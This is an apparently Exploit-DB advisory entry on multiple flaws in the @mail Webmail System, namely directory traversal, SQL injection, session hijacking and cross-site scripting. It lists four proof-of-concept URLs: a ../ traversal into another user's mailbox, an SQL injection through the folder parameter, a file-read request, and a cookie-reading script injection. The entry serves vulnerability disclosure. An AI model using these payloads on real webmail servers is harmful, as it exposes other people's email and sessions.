https://www.exploit-db.com/exploits/23421

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../[email protected]/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='[email protected]&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>